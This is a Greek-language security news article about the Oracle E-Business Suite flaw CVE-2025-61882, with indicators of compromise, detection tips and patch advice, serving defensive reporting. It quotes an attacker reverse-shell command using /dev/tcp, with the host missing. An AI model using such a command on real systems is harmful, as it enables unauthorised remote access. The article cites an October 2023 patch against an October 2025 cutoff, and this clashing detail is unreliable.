Μια κρίσιμη ευπάθεια zero-day στο Oracle E-Business Suite έχει αναδειχθεί ως σημαντική απειλή για τα επιχειρησιακά περιβάλλοντα, με τον κώδικα εκμετάλλευσης proof-of-concept (PoC) να είναι πλέον δημόσια διαθέσιμος.
Δείτε επίσης: Η Oracle επιβεβαιώνει ότι χάκερ στοχεύουν δεδομένα της E-Business Suite

Η ευπάθεια CVE-2025-61882 παρουσιάζει σοβαρό κίνδυνο ασφαλείας, επιτυγχάνοντας μέγιστη βαθμολογία CVSS 3.1 9.8 και επιτρέποντας απομακρυσμένη εκτέλεση κώδικα χωρίς αυθεντικοποίηση σε πολλές εκδόσεις του Oracle E-Business Suite.
Η ευπάθεια επηρεάζει τις εκδόσεις του Oracle E-Business Suite από 12.2.3 έως 12.2.14, στοχεύοντας συγκεκριμένα το στοιχείο Oracle Concurrent Processing BI Publisher Integration μέσω του πρωτοκόλλου HTTP.
Οι ερευνητές ασφαλείας έχουν εντοπίσει ένα ελάττωμα που επιτρέπει σε μη αυθεντικοποιημένους απομακρυσμένους επιτιθέμενους να εκτελούν αυθαίρετο κώδικα σε ευάλωτα συστήματα μέσω εκμετάλλευσης που βασίζεται στο δίκτυο με χαμηλή πολυπλοκότητα επίθεσης.
Η συμβουλευτική ασφαλείας της Oracle υπογραμμίζει την ταξινόμηση της ευπάθειας ως “απομακρυσμένα εκμεταλλεύσιμη χωρίς αυθεντικοποίηση“, που σημαίνει ότι οι επιτιθέμενοι μπορούν να εκμεταλλευτούν την πρόσβαση στο δίκτυο χωρίς να απαιτούνται έγκυρα διαπιστευτήρια.
Ο φορέας επίθεσης της ευπάθειας χρησιμοποιεί επικοινωνίες HTTP, με το πεδίο εφαρμογής να παραμένει αμετάβλητο αλλά να παρέχει υψηλό αντίκτυπο στους δείκτες εμπιστευτικότητας, ακεραιότητας και διαθεσιμότητας.
Οι οργανισμοί μπορούν να εντοπίσουν ευάλωτες περιπτώσεις χρησιμοποιώντας πρότυπα ανίχνευσης Nuclei που ελέγχουν για το κείμενο “E-Business Suite Home Page” ενώ συγκρίνουν τις χρονικές σφραγίδες Last-Modified με την 4η Οκτωβρίου 2025.
Δείτε ακόμα: Εκβιαστικά emails ισχυρίζονται κλοπή δεδομένων Oracle E-Business Suite

Η Κρίσιμη Ενημέρωση Ασφαλείας της Oracle για τον Οκτώβριο του 2023 χρησιμεύει ως προαπαιτούμενο για την εφαρμογή των απαραίτητων ενημερώσεων ασφαλείας. Τα συστήματα με ημερομηνίες τροποποίησης πριν από αυτό το όριο υποδεικνύουν μη ενημερωμένες εγκαταστάσεις που είναι ευάλωτες στην εκμετάλλευση.
Έχουν καταγραφεί ενεργές προσπάθειες εκμετάλλευσης μέσω συγκεκριμένων Δεικτών Παραβίασης (IOCs), συμπεριλαμβανομένων κακόβουλων διευθύνσεων IP 200[.]107[.]207[.]26 και 185[.]181[.]60[.]11 που διεξάγουν δραστηριότητες GET και POST. Οι επιτιθέμενοι χρησιμοποιούν εντολές reverse shell όπως sh -c /bin/bash -i >& /dev/tcp// 0>&1 για να δημιουργήσουν εξερχόμενες συνδέσεις TCP για επίμονη πρόσβαση.
Η ανάλυση αποκαλύπτει κακόβουλα αντικείμενα, συμπεριλαμβανομένου του εργαλείου εκμετάλλευσης oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) που περιέχει Python scripts εκμετάλλευσης exp.py και server.py.
Αυτά τα εργαλεία δείχνουν εξελιγμένες μεθοδολογίες επίθεσης που πιθανώς συνδέονται με γνωστές ομάδες απειλών, συμπεριλαμβανομένων αναφορών σε Scattered Spider, Lapsus$, και Cl0p ransomware operations.
Η Oracle συνιστά έντονα την άμεση εφαρμογή ενημερώσεων σε όλες τις επηρεαζόμενες εγκαταστάσεις του E-Business Suite, τονίζοντας ότι μόνο τα συστήματα υπό Premier Support ή Extended Support λαμβάνουν ενημερώσεις ασφαλείας.
Δείτε επίσης: Η OpenAI υπογράφει συμφωνία με την Oracle για Project Stargate
🔒 Προστατέψτε την ιδιωτικότητά σας με Proton VPN
Ελβετικό VPN από τους δημιουργούς του Proton Mail — αυστηρή πολιτική no-logs, ισχυρή κρυπτογράφηση και ενσωματωμένο NetShield που μπλοκάρει διαφημίσεις, trackers & malware.
- ✔ No-logs, με έδρα την Ελβετία (εκτός 14-Eyes)
- ✔ NetShield: φραγή διαφημίσεων, trackers & κακόβουλων domains
- ✔ Καλύπτει όλες τις συσκευές — δωρεάν έκδοση διαθέσιμη
Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.

Οι οργανισμοί θα πρέπει να εφαρμόσουν παρακολούθηση δικτύου για τους αναγνωρισμένους Δείκτες Παραβίασης ενώ διεξάγουν ολοκληρωμένες αξιολογήσεις ευπάθειας χρησιμοποιώντας διαθέσιμα πρότυπα ανίχνευσης και ερωτήματα Shodan που στοχεύουν μοτίβα html:”OA_HTML” για να εντοπίσουν εκτεθειμένες περιπτώσεις.
